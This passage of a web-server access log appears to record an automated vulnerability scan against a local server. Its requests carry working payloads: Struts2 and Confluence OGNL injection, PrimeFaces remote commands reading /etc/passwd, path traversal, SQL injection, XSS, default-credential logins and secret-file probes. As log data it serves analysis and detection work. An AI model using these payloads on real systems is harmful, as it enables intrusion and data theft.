(KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/prostore/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query?db=db&q=SHOW%20DATABASES HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/database-backups/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229N5Ehu7OEyq9VFnhn2AyWlZaPM\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockercfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlrpc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:53 